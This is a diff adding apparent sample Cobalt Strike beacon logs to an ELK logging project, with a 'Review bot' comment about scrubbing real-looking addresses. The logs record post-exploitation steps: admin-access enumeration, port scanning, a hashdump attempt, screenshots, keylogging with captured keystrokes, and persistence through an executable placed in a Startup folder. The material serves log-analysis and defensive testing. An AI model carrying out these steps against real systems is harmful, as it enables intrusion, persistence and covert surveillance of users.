CN=ADMIN-R.Domburg,OU=User,OU=Accounts,DC=stroop,DC=local + +GroupDomain : stroop.local +GroupName : Domain Admins +MemberDomain : stroop.local +MemberName : bofh +MemberSID : S-1-5-21-2163199188-2306780613-1636707950-500 +IsGroup : False +MemberDN : CN=bofh,CN=Users,DC=stroop,DC=local + + + +System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1 + +03/30 08:26:21 UTC [input] powershell find-localadminaccess -noping +03/30 08:26:21 UTC [task] Tasked beacon to run: find-localadminaccess -noping +03/30 08:26:22 UTC [checkin] host called home, sent: 349 bytes 
+03/30 08:26:25 UTC [output] +received output: +#< CLIXML +L-WIN224.stroop.local +System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1 + +03/30 08:26:49 UTC [input] powershell Get-NetLocalGroup -computername l-win224 +03/30 08:26:49 UTC [task] Tasked beacon to run: Get-NetLocalGroup -computername l-win224 +03/30 08:26:49 UTC [checkin] host called home, sent: 377 bytes +03/30 08:26:53 UTC [output] +received output: +#< CLIXML + + +ComputerName : l-win224 +AccountName : STROOP/l-win224/bofh +IsDomain : False +IsGroup : False +SID : S-1-5-21-1770739200-3703860189-1291868052-500 +Description : Built-in account for administering the computer/domain +PwdLastSet : 3/29/2020 2:17:31 AM +PwdExpired : False +UserFlags : 66049 +Disabled : False +LastLogin : 3/30/2020 8:25:09 AM + +ComputerName : l-win224 +AccountName : stroop.local/Domain Admins +IsDomain : True +IsGroup : True +SID : S-1-5-21-2163199188-2306780613-1636707950-512 +Description : +Disabled : +LastLogin : +PwdLastSet : +PwdExpired : +UserFlags : + +ComputerName : l-win224 +AccountName : stroop.local/Domain Users +IsDomain : True +IsGroup : True +SID : S-1-5-21-2163199188-2306780613-1636707950-513 +Description : +Disabled : +LastLogin : +PwdLastSet : +PwdExpired : +UserFlags : + + + +System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1 + +03/30 08:27:33 UTC [input] portscan l-win224.stroop.local 135,445,3389 none +03/30 08:27:33 UTC [task] Tasked beacon to scan ports 135,445,3389 on l-win224.stroop.local +03/30 08:27:36 UTC [checkin] host called home, sent: 93245 bytes +03/30 08:27:42 UTC [output] +received output: +l-win224.stroop.local:3389 +l-win224.stroop.local:135 +l-win224.stroop.local:445 (platform: 500 version: 10.0 name: L-WIN224 domain: STROOP) +Scanner module is complete + + +03/30 08:41:44 UTC [input] note beacon was cutoff 
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/beacon_936715360.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/beacon_936715360.log
new file mode 100644
index 00000000..ec0d6665
--- /dev/null
+++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/beacon_936715360.log
@@ -0,0 +1,531 @@ +03/30 07:55:47 UTC [metadata] 13.81.175.116 <- 10.1.3.10; computer: L-WIN223; user: w.tax; process: rundll32.exe; pid: 7872; os: Windows; version: 10.0; beacon arch: x86 (x64) +03/30 07:56:16 UTC [input] ps +03/30 07:56:16 UTC [task] Tasked beacon to list processes +03/30 07:56:18 UTC [checkin] host called home, sent: 12 bytes +03/30 07:56:18 UTC [output] +[System Process] 0 0 +System 0 4 +Registry 4 88 +smss.exe 4 404 +csrss.exe 496 512 +wininit.exe 496 588 +csrss.exe 580 596 +winlogon.exe 580 680 +services.exe 588 688 +lsass.exe 588 728 +svchost.exe 688 836 +fontdrvhost.exe 680 844 +fontdrvhost.exe 588 852 +svchost.exe 688 920 +svchost.exe 688 972 +svchost.exe 688 1012 +LogonUI.exe 680 496 +dwm.exe 680 756 +svchost.exe 688 1028 +svchost.exe 688 1040 +svchost.exe 688 1132 +svchost.exe 688 1140 +svchost.exe 688 1148 +svchost.exe 688 1156 +svchost.exe 688 1264 +svchost.exe 688 1304 +svchost.exe 688 1332 +svchost.exe 688 1368 +svchost.exe 688 1424 +svchost.exe 688 1464 +svchost.exe 688 1484 +svchost.exe 688 1620 +svchost.exe 688 1628 +svchost.exe 688 1732 +svchost.exe 688 1756 +svchost.exe 688 1772 +svchost.exe 688 1832 +taskhostw.exe 1132 1848 +svchost.exe 688 1872 +svchost.exe 688 1904 +svchost.exe 688 1924 +svchost.exe 688 2012 +svchost.exe 688 1528 +svchost.exe 688 1568 +svchost.exe 688 2052 +svchost.exe 688 2112 +svchost.exe 688 2240 +Memory Compression 4 2248 +svchost.exe 688 2284 +VSSVC.exe 688 2320 +svchost.exe 688 2384 +svchost.exe 688 2428 +svchost.exe 688 2448 +svchost.exe 688 2568 +svchost.exe 688 2656 +svchost.exe 688 2664 +svchost.exe 688 2672 +svchost.exe 688 2788 +svchost.exe 688 2796 +svchost.exe 688 2804 +svchost.exe 688 2920 +svchost.exe 688 2928 +spoolsv.exe 688 2512 +OfficeClickToRun.exe 688 3320 +sysmon64.exe 688 3328 +WaAppAgent.exe 688 3336 +WindowsAzureTelemetryService.exe 688 3344 +WindowsAzureGuestAgent.exe 688 3352 +WindowsAzureNetAgent.exe 688 3360 +svchost.exe 688 3368 +svchost.exe 688 3376 +svchost.exe 688 3384 
+svchost.exe 688 3392 +svchost.exe 688 3400 +svchost.exe 688 3408 +svchost.exe 688 3416 +MsMpEng.exe 688 3424 +svchost.exe 688 3432 +svchost.exe 688 3796 +VFPlugin.exe 3360 3896 +conhost.exe 3896 3960 +unsecapp.exe 920 3236 +WmiPrvSE.exe 920 4104 +svchost.exe 688 4424 +svchost.exe 688 4468 +WmiPrvSE.exe 920 4712 +svchost.exe 688 4924 +svchost.exe 688 4960 +csrss.exe 5148 5156 +winlogon.exe 5148 5200 +fontdrvhost.exe 5200 5364 +dwm.exe 5200 5436 +svchost.exe 688 5628 +rdpclip.exe 1040 5988 x64 STROOP\w.tax 2 +sihost.exe 1484 6036 x64 STROOP\w.tax 2 +svchost.exe 688 6056 x64 STROOP\w.tax 2 +svchost.exe 688 6116 x64 STROOP\w.tax 2 +taskhostw.exe 1132 5312 x64 STROOP\w.tax 2 +svchost.exe 688 5592 +svchost.exe 688 4792 +ctfmon.exe 4792 5016 x64 STROOP\w.tax 2 +explorer.exe 6212 6236 x64 STROOP\w.tax 2 +svchost.exe 688 6252 +svchost.exe 688 6424 x64 STROOP\w.tax 2 +ShellExperienceHost.exe 920 6664 x64 STROOP\w.tax 2 +svchost.exe 688 6784 +SearchUI.exe 920 6832 x64 STROOP\w.tax 2 +RuntimeBroker.exe 920 6956 x64 STROOP\w.tax 2 +RuntimeBroker.exe 920 7112 x64 STROOP\w.tax 2 +RuntimeBroker.exe 920 6712 x64 STROOP\w.tax 2 +SearchIndexer.exe 688 6708 +svchost.exe 688 7208 +svchost.exe 688 7244 +svchost.exe 688 7316 +smartscreen.exe 920 7428 x64 STROOP\w.tax 2 +SecurityHealthSystray.exe 6236 7472 x64 STROOP\w.tax 2 +SecurityHealthService.exe 688 7512 +svchost.exe 688 7780 +WaSecAgentProv.exe 3336 5764 +conhost.exe 5764 6940 +SgrmBroker.exe 688 5720 +svchost.exe 688 1720 +svchost.exe 688 1992 +svchost.exe 688 2104 x64 STROOP\w.tax 2 +WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe 920 1456 x64 STROOP\w.tax 2 +dllhost.exe 920 3028 x64 STROOP\w.tax 2 +chrome.exe 6236 4396 x64 STROOP\w.tax 2 +svchost.exe 688 4752 +chrome.exe 4396 6272 x64 STROOP\w.tax 2 +chrome.exe 4396 5484 x64 STROOP\w.tax 2 +chrome.exe 4396 7688 x64 STROOP\w.tax 2 +chrome.exe 4396 7728 x64 STROOP\w.tax 2 +chrome.exe 4396 5080 x64 STROOP\w.tax 2 +POWERPNT.EXE 6236 6440 x86 STROOP\w.tax 2 
+WmiPrvSE.exe 920 2008 +chrome.exe 4396 800 x64 STROOP\w.tax 2 +chrome.exe 4396 152 x64 STROOP\w.tax 2 +SearchProtocolHost.exe 6708 5552 +SearchFilterHost.exe 6708 6332 +WINWORD.EXE 2908 2212 x86 STROOP\w.tax 2 +rundll32.exe 2212 7872 x86 STROOP\w.tax 2 +svchost.exe 688 6472 + + +03/30 07:56:29 UTC [input] pwd +03/30 07:56:29 UTC [task] <> Tasked beacon to print working directory +03/30 07:56:32 UTC [checkin] host called home, sent: 8 bytes +03/30 07:56:32 UTC [output] +Current directory is C:\windows\system32 + +03/30 07:56:47 UTC [input] hashdump +03/30 07:56:47 UTC [error] hashdump error: this command requires administrator privileges +03/30 07:57:03 UTC [input] screenshot +03/30 07:57:03 UTC [task] Tasked beacon to take screenshot +03/30 07:57:05 UTC [checkin] host called home, sent: 162370 bytes +03/30 07:57:07 UTC [output] +received screenshot (200776 bytes) + +03/30 07:57:31 UTC [input] keylogger +03/30 07:57:31 UTC [task] Tasked beacon to log keystrokes +03/30 07:57:35 UTC [checkin] host called home, sent: 65602 bytes +03/30 07:58:09 UTC [output] +received keystrokes + +03/30 07:58:19 UTC [output] +received keystrokes + +03/30 07:58:24 UTC [input] screenshot +03/30 07:58:24 UTC [task] Tasked beacon to take screenshot +03/30 07:58:29 UTC [checkin] host called home, sent: 162370 bytes +03/30 07:58:30 UTC [output] +received keystrokes + +03/30 07:58:30 UTC [output] +received screenshot (223469 bytes) + +03/30 07:58:49 UTC [output] +received keystrokes + +03/30 07:58:59 UTC [output] +received keystrokes + +03/30 07:59:09 UTC [output] +received keystrokes + +03/30 07:59:18 UTC [output] +received keystrokes + +03/30 07:59:27 UTC [output] +received keystrokes + +03/30 07:59:37 UTC [output] +received keystrokes + +03/30 07:59:51 UTC [output] +received keystrokes + +03/30 08:00:00 UTC [output] +received keystrokes + +03/30 08:00:10 UTC [output] +received keystrokes + +03/30 08:02:47 UTC [output] +received keystrokes + +03/30 08:03:01 UTC [output] +received 
keystrokes + +03/30 08:03:10 UTC [output] +received keystrokes + +03/30 08:03:20 UTC [output] +received keystrokes + +03/30 08:03:30 UTC [output] +received keystrokes + +03/30 08:03:30 UTC [input] screenshot +03/30 08:03:30 UTC [task] Tasked beacon to take screenshot +03/30 08:03:34 UTC [checkin] host called home, sent: 162370 bytes +03/30 08:03:35 UTC [output] +received screenshot (242880 bytes) + +03/30 08:03:50 UTC [input] jobs +03/30 08:03:50 UTC [task] <> Tasked beacon to list jobs +03/30 08:03:55 UTC [checkin] host called home, sent: 8 bytes +03/30 08:03:55 UTC [output] +1 0 keystroke logger + + +03/30 08:04:51 UTC [input] cd c:\users +03/30 08:04:51 UTC [task] <> cd c:\users +03/30 08:04:52 UTC [checkin] host called home, sent: 16 bytes +03/30 08:04:55 UTC [input] pwd +03/30 08:04:55 UTC [task] <> Tasked beacon to print working directory +03/30 08:04:57 UTC [checkin] host called home, sent: 8 bytes +03/30 08:04:57 UTC [output] +Current directory is c:\users + +03/30 08:04:58 UTC [input] ls +03/30 08:04:58 UTC [task] <> Tasked beacon to list files in . +03/30 08:05:01 UTC [checkin] host called home, sent: 19 bytes +03/30 08:05:01 UTC [output] +c:\users\* +D 0 03/29/2020 11:36:14 . +D 0 03/29/2020 11:36:14 .. +D 0 09/15/2018 07:42:33 All Users +D 0 03/29/2020 10:17:23 bofh +D 0 03/29/2020 11:22:00 bofh.STROOP +D 0 03/07/2020 10:40:02 Default +D 0 09/15/2018 07:42:33 Default User +F 174 09/15/2018 07:31:34 desktop.ini +D 0 03/07/2020 10:35:06 Public +D 0 03/29/2020 11:36:22 w.tax + + +03/30 08:05:48 UTC [input] cd w.tax\AppData\Roaming\Microsoft\Windows\ +03/30 08:05:48 UTC [task] <> cd w.tax\AppData\Roaming\Microsoft\Windows\ +03/30 08:05:49 UTC [input] ls +03/30 08:05:49 UTC [task] <> Tasked beacon to list files in . +03/30 08:05:49 UTC [checkin] host called home, sent: 67 bytes +03/30 08:05:49 UTC [output] +c:\users\w.tax\AppData\Roaming\Microsoft\Windows\* +D 0 03/29/2020 11:36:24 . +D 0 03/29/2020 11:36:24 .. 
+D 0 03/29/2020 11:36:22 AccountPictures +D 0 09/15/2018 07:33:50 CloudStore +D 0 03/29/2020 11:36:22 Libraries +D 0 09/15/2018 07:33:50 Network Shortcuts +D 0 09/15/2018 07:33:50 Printer Shortcuts +D 0 03/30/2020 07:58:17 Recent +D 0 03/29/2020 11:37:29 SendTo +D 0 03/29/2020 11:36:22 Start Menu +D 0 09/15/2018 07:33:50 Templates +D 0 03/30/2020 07:45:52 Themes + + +03/30 08:05:54 UTC [input] cd Start Menu +03/30 08:05:54 UTC [task] <> cd Start Menu +03/30 08:05:54 UTC [checkin] host called home, sent: 18 bytes +03/30 08:05:56 UTC [input] ls +03/30 08:05:56 UTC [task] <> Tasked beacon to list files in . +03/30 08:05:59 UTC [checkin] host called home, sent: 19 bytes +03/30 08:05:59 UTC [output] +c:\users\w.tax\AppData\Roaming\Microsoft\Windows\Start Menu\* +D 0 03/29/2020 11:36:22 . +D 0 03/29/2020 11:36:22 .. +F 174 03/29/2020 11:36:22 desktop.ini +D 0 03/29/2020 11:36:22 Programs + + +03/30 08:06:03 UTC [input] cd Programs +03/30 08:06:03 UTC [task] <> cd Programs +03/30 08:06:04 UTC [input] ls +03/30 08:06:04 UTC [task] <> Tasked beacon to list files in . +03/30 08:06:04 UTC [checkin] host called home, sent: 35 bytes +03/30 08:06:04 UTC [output] +c:\users\w.tax\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\* +D 0 03/29/2020 11:36:22 . +D 0 03/29/2020 11:36:22 .. 
+D 0 03/07/2020 00:55:56 Accessibility +D 0 03/29/2020 11:36:21 Accessories +D 0 03/29/2020 11:36:22 Administrative Tools +F 174 03/29/2020 11:36:22 desktop.ini +D 0 09/15/2018 07:33:54 Maintenance +D 0 03/29/2020 11:36:22 Startup +D 0 09/15/2018 07:33:54 System Tools +D 0 09/15/2018 07:34:10 Windows PowerShell + + +03/30 08:06:08 UTC [input] cd Startup +03/30 08:06:08 UTC [task] <> cd Startup +03/30 08:06:09 UTC [checkin] host called home, sent: 15 bytes +03/30 08:07:20 UTC [input] upload /Users/marcs/mousedrivercontrol.exe +03/30 08:07:20 UTC [task] <> Tasked beacon to upload /Users/marcs/mousedrivercontrol.exe as mousedrivercontrol.exe +03/30 08:07:20 UTC [indicator] file: 351274f85af9b22f88152ceb80456dd0 289280 bytes mousedrivercontrol.exe +03/30 08:07:21 UTC [checkin] host called home, sent: 289314 bytes +03/30 08:07:37 UTC [input] ls +03/30 08:07:37 UTC [task] <> Tasked beacon to list files in . +03/30 08:07:40 UTC [checkin] host called home, sent: 19 bytes +03/30 08:07:40 UTC [output] +c:\users\w.tax\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\* +D 0 03/30/2020 08:07:21 . +D 0 03/30/2020 08:07:21 .. 
+F 174 03/29/2020 11:36:22 desktop.ini +F 289280 03/30/2020 08:07:21 mousedrivercontrol.exe + + +03/30 08:07:56 UTC [input] run mousedrivercontrol.exe +03/30 08:07:56 UTC [task] Tasked beacon to run: mousedrivercontrol.exe +03/30 08:07:59 UTC [checkin] host called home, sent: 40 bytes +03/30 08:08:13 UTC [input] ps +03/30 08:08:13 UTC [task] Tasked beacon to list processes +03/30 08:08:13 UTC [checkin] host called home, sent: 12 bytes +03/30 08:08:13 UTC [output] +[System Process] 0 0 +System 0 4 +Registry 4 88 +smss.exe 4 404 +csrss.exe 496 512 +wininit.exe 496 588 +csrss.exe 580 596 +winlogon.exe 580 680 +services.exe 588 688 +lsass.exe 588 728 +svchost.exe 688 836 +fontdrvhost.exe 680 844 +fontdrvhost.exe 588 852 +svchost.exe 688 920 +svchost.exe 688 972 +svchost.exe 688 1012 +LogonUI.exe 680 496 +dwm.exe 680 756 +svchost.exe 688 1040 +svchost.exe 688 1132 +svchost.exe 688 1140 +svchost.exe 688 1148 +svchost.exe 688 1156 +svchost.exe 688 1264 +svchost.exe 688 1304 +svchost.exe 688 1332 +svchost.exe 688 1368 +svchost.exe 688 1424 +svchost.exe 688 1464 +svchost.exe 688 1484 +svchost.exe 688 1620 +svchost.exe 688 1628 +svchost.exe 688 1732 +svchost.exe 688 1756 +svchost.exe 688 1772 +svchost.exe 688 1832 +taskhostw.exe 1132 1848 +svchost.exe 688 1872 +svchost.exe 688 1904 +svchost.exe 688 1924 +svchost.exe 688 2012 +svchost.exe 688 1528 +svchost.exe 688 1568 +svchost.exe 688 2052 +svchost.exe 688 2112 +svchost.exe 688 2240 +Memory Compression 4 2248 +svchost.exe 688 2284 +VSSVC.exe 688 2320 +svchost.exe 688 2384 +svchost.exe 688 2428 +svchost.exe 688 2448 +svchost.exe 688 2568 +svchost.exe 688 2656 +svchost.exe 688 2664 +svchost.exe 688 2672 +svchost.exe 688 2788 +svchost.exe 688 2796 +svchost.exe 688 2804 +svchost.exe 688 2920 +svchost.exe 688 2928 +spoolsv.exe 688 2512 +OfficeClickToRun.exe 688 3320 +sysmon64.exe 688 3328 +WaAppAgent.exe 688 3336 +WindowsAzureTelemetryService.exe 688 3344 +WindowsAzureGuestAgent.exe 688 3352 +WindowsAzureNetAgent.exe 688 3360 
+svchost.exe 688 3368 +svchost.exe 688 3376 +svchost.exe 688 3384 +svchost.exe 688 3392 +svchost.exe 688 3400 +svchost.exe 688 3408 +svchost.exe 688 3416 +MsMpEng.exe 688 3424 +svchost.exe 688 3432 +svchost.exe 688 3796 +VFPlugin.exe 3360 3896 +conhost.exe 3896 3960 +unsecapp.exe 920 3236 +WmiPrvSE.exe 920 4104 +svchost.exe 688 4424 +WmiPrvSE.exe 920 4712 +svchost.exe 688 4924 +svchost.exe 688 4960 +csrss.exe 5148 5156 +winlogon.exe 5148 5200 +fontdrvhost.exe 5200 5364 +dwm.exe 5200 5436 +svchost.exe 688 5628 +rdpclip.exe 1040 5988 x64 STROOP\w.tax 2 +sihost.exe 1484 6036 x64 STROOP\w.tax 2 +svchost.exe 688 6056 x64 STROOP\w.tax 2 +svchost.exe 688 6116 x64 STROOP\w.tax 2 +taskhostw.exe 1132 5312 x64 STROOP\w.tax 2 +svchost.exe 688 5592 +svchost.exe 688 4792 +ctfmon.exe 4792 5016 x64 STROOP\w.tax 2 +explorer.exe 6212 6236 x64 STROOP\w.tax 2 +svchost.exe 688 6252 +svchost.exe 688 6424 x64 STROOP\w.tax 2 +ShellExperienceHost.exe 920 6664 x64 STROOP\w.tax 2 +svchost.exe 688 6784 +SearchUI.exe 920 6832 x64 STROOP\w.tax 2 +RuntimeBroker.exe 920 6956 x64 STROOP\w.tax 2 +RuntimeBroker.exe 920 7112 x64 STROOP\w.tax 2 +RuntimeBroker.exe 920 6712 x64 STROOP\w.tax 2 +SearchIndexer.exe 688 6708 +svchost.exe 688 7208 +svchost.exe 688 7244 +svchost.exe 688 7316 +smartscreen.exe 920 7428 x64 STROOP\w.tax 2 +SecurityHealthSystray.exe 6236 7472 x64 STROOP\w.tax 2 +SecurityHealthService.exe 688 7512 +svchost.exe 688 7780 +WaSecAgentProv.exe 3336 5764 +conhost.exe 5764 6940 +SgrmBroker.exe 688 5720 +svchost.exe 688 1720 +svchost.exe 688 1992 +svchost.exe 688 2104 x64 STROOP\w.tax 2 +WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe 920 1456 x64 STROOP\w.tax 2 +dllhost.exe 920 3028 x64 STROOP\w.tax 2 +chrome.exe 6236 4396 x64 STROOP\w.tax 2 +svchost.exe 688 4752 +chrome.exe 4396 6272 x64 STROOP\w.tax 2 +chrome.exe 4396 5484 x64 STROOP\w.tax 2 +chrome.exe 4396 7688 x64 STROOP\w.tax 2 +chrome.exe 4396 7728 x64 STROOP\w.tax 2 +chrome.exe 4396 5080 x64 STROOP\w.tax 2 
+POWERPNT.EXE 6236 6440 x86 STROOP\w.tax 2 +chrome.exe 4396 800 x64 STROOP\w.tax 2 +chrome.exe 4396 152 x64 STROOP\w.tax 2 +WINWORD.EXE 2908 2212 x86 STROOP\w.tax 2 +rundll32.exe 2212 7872 x86 STROOP\w.tax 2 +rundll32.exe 7872 3816 x86 STROOP\w.tax 2 +MSOSYNC.EXE 6440 1644 x86 STROOP\w.tax 2 +svchost.exe 688 3724 +svchost.exe 688 64 +svchost.exe 688 3728 +TrustedInstaller.exe 688 2540 +TiWorker.exe 920 4692 +svchost.exe 688 7660 +svchost.exe 688 4356 + + +03/30 08:08:45 UTC [input] run c:\users\w.tax\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mousedrivercontrol.exe +03/30 08:08:45 UTC [task] Tasked beacon to run: c:\users\w.tax\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mousedrivercontrol.exe +03/30 08:08:46 UTC [checkin] host called home, sent: 117 bytes +03/30 08:09:48 UTC [output] +received keystrokes + +03/30 08:09:58 UTC [output] +received keystrokes + +03/30 08:10:07 UTC [output] +received keystrokes + +03/30 08:10:45 UTC [input] jobkill 1 +03/30 08:10:45 UTC [task] <> Tasked beacon to kill job 1 +03/30 08:10:45 UTC [checkin] host called home, sent: 10 bytes +03/30 08:10:48 UTC [input] jobs +03/30 08:10:48 UTC [task] <> Tasked beacon to list jobs +03/30 08:10:50 UTC [checkin] host called home, sent: 8 bytes +03/30 08:10:50 UTC [output] + + +03/30 08:13:29 UTC [input] upload /Users/marcs/mousedrivercontrol.exe +03/30 08:13:30 UTC [task] <> Tasked beacon to upload /Users/marcs/mousedrivercontrol.exe as mousedrivercontrol.exe +03/30 08:13:30 UTC [indicator] file: 4c859c9ba229c6018c91eb00d075674a 288256 bytes mousedrivercontrol.exe +03/30 08:13:32 UTC [checkin] host called home, sent: 288290 bytes +03/30 08:13:35 UTC [input] ls +03/30 08:13:35 UTC [task] <> Tasked beacon to list files in . +03/30 08:13:37 UTC [checkin] host called home, sent: 19 bytes +03/30 08:13:37 UTC [output] +c:\users\w.tax\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\* +D 0 03/30/2020 08:07:21 . +D 0 03/30/2020 08:07:21 .. 
+F 174 03/29/2020 11:36:22 desktop.ini
+F 288256 03/30/2020 08:13:32 mousedrivercontrol.exe
+
+
+03/30 08:13:45 UTC [input] run c:\users\w.tax\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mousedrivercontrol.exe
+03/30 08:13:45 UTC [task] Tasked beacon to run: c:\users\w.tax\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mousedrivercontrol.exe
+03/30 08:13:46 UTC [checkin] host called home, sent: 117 bytes
+03/30 08:14:20 UTC [input] sleep 30 5
+03/30 08:14:20 UTC [task] Tasked beacon to sleep for 30s (5% jitter)
+03/30 08:14:20 UTC [checkin] host called home, sent: 16 bytes
+03/30 08:41:54 UTC [input] note beacon initial access
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/keystrokes/keystrokes_936715360.txt b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/keystrokes/keystrokes_936715360.txt
new file mode 100644
index 00000000..2ad1d1f9
--- /dev/null
+++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/keystrokes/keystrokes_936715360.txt
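Review bot: Nothing in this sample beacon log, or in the commit, says whether the values it carries are synthetic — the team-server address in the `[metadata]` line (`13.81.175.116`), the operator's workstation path in the two `upload /Users/marcs/mousedrivercontrol.exe` lines, and the file hashes on the `[indicator]` lines all read as real. If they are not intentionally fictitious, scrub them before the data ships; either way a short README beside the sample data, stating that the hosts, addresses, SIDs and hashes come from a lab and are safe to ingest, would stop anyone who loads these logs into the ELK stack from treating them as live indicators. The same point applies to the `[metadata]` line of the 10.1.3.11 beacon log further down, whose hunk runs past the end of this view.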
@@ -0,0 +1,81 @@ +03/30 07:58:09 UTC Received keystrokes + + + +CSave As +E======= +RecipeTeammeeting_ +03/30 07:58:19 UTC Received keystrokes + +Apr1_newrecipes +03/30 07:58:30 UTC Received keystrokes + + + +03/30 07:58:49 UTC Received keystrokes + + + +CRecipeTeammeeting_Apr1_newrecipes - PowerPoint +E======= +2021 +03/30 07:58:59 UTC Received keystrokes + +2020 & Holidat season 20202[left]2[left]2[left]2[left]2[left] +03/30 07:59:09 UTC Received keystrokes + +2[left]2[left]2[left]2[left]2[left]2[left]2[left]2[left]y2[end] +2021 introduces +03/30 07:59:18 UTC Received keystrokes + + new 'special' flavour' 2[left]2[left]2[left]2[left]2[left]2[left] +03/30 07:59:27 UTC Received keystrokes + +2[end] +03/30 07:59:37 UTC Received keystrokes + + +We need to act now to j2[backspace]eep ahe +03/30 07:59:51 UTC Received keystrokes + +ad of competitors2[right]k +03/30 08:00:00 UTC Received keystrokes + + +2[tab] +03/30 08:00:10 UTC Received keystrokes + +Decided: +03/30 08:02:47 UTC Received keystrokes + +Ani +03/30 08:03:01 UTC Received keystrokes + +se snowflakes +2[tab]Decided +03/30 08:03:10 UTC Received keystrokes + +: Peanut +03/30 08:03:20 UTC Received keystrokes + + butter OR +03/30 08:03:30 UTC Received keystrokes + +Nutella +03/30 08:09:48 UTC Received keystrokes + + + +C +E======= +2[command] +03/30 08:09:58 UTC Received keystrokes + + + +CSearch +E======= +start +03/30 08:10:07 UTC Received keystrokes + + up2[down]2[down]2[right] diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/screenshots/screen_075707_936715360.jpg b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/screenshots/screen_075707_936715360.jpg new file mode 100644 index 00000000..d1b84da9 Binary files /dev/null and b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/screenshots/screen_075707_936715360.jpg differ 
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/screenshots/screen_075830_936715360.jpg b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/screenshots/screen_075830_936715360.jpg
new file mode 100644
index 00000000..d1162904
Binary files /dev/null and b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/screenshots/screen_075830_936715360.jpg differ
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/screenshots/screen_080335_936715360.jpg b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/screenshots/screen_080335_936715360.jpg
new file mode 100644
index 00000000..ee69571d
Binary files /dev/null and b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.10/screenshots/screen_080335_936715360.jpg differ
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.11/beacon_1282172642.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.11/beacon_1282172642.log
new file mode 100644
index 00000000..1309b752
--- /dev/null
+++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200330/10.1.3.11/beacon_1282172642.log
@@ -0,0 +1,5994 @@
+03/30 08:44:17 UTC [metadata] 13.81.175.72 <- 10.1.3.11; computer: L-WIN224; user: W.Tax *; process: wsmprovhost.exe; pid: 4164; os: Windows; version: 10.0; beacon arch: x64 (x64)
+03/30 08:44:25 UTC [input] ps
+03/30 08:44:25 UTC [task] Tasked beacon to list processes
+03/30 08:44:27 UTC [checkin] host called home, sent: 12 bytes
+03/30 08:44:27 UTC [output]
+[System Process] 0 0
+System 0 4 x64 0
+Registry 4 88 x64 NT AUTHORITY\SYSTEM 0
+smss.exe 4 404 x64 NT AUTHORITY\SYSTEM 0
+csrss.exe 504 512 x64 NT AUTHORITY\SYSTEM 0
+wininit.exe 504 584 x64 NT AUTHORITY\SYSTEM 0
+csrss.exe 576 592 x64 NT AUTHORITY\SYSTEM 1
+winlogon.exe 576 676 x64 NT AUTHORITY\SYSTEM 1
+services.exe 584 692 x64 NT AUTHORITY\SYSTEM 0
+lsass.exe 584 724 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 832 x64 NT AUTHORITY\SYSTEM 0
+fontdrvhost.exe 676 840 x64 Font Driver Host\UMFD-1 1
+fontdrvhost.exe 584 848 x64 Font Driver Host\UMFD-0 0
+svchost.exe 692 916 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 956 x64 NT AUTHORITY\NETWORK SERVICE 0
+svchost.exe 692 1012 x64 NT AUTHORITY\SYSTEM 0
+LogonUI.exe 676 508 x64 NT AUTHORITY\SYSTEM 1
+dwm.exe 676 744 x64 Window Manager\DWM-1 1
+svchost.exe 692 932 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 972 x64 NT AUTHORITY\NETWORK SERVICE 0
+svchost.exe 692 1092 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 692 1100 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 692 1132 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 1168 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 1224 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 692 1288 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 692 1296 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 1348 x64 NT AUTHORITY\NETWORK SERVICE 0
+svchost.exe 692 1432 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 1476 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 1496 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 692 1668 x64 NT AUTHORITY\NETWORK SERVICE 0
+svchost.exe 692 1680 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 1692 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 1752 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 692 1760 x64 NT AUTHORITY\SYSTEM 0
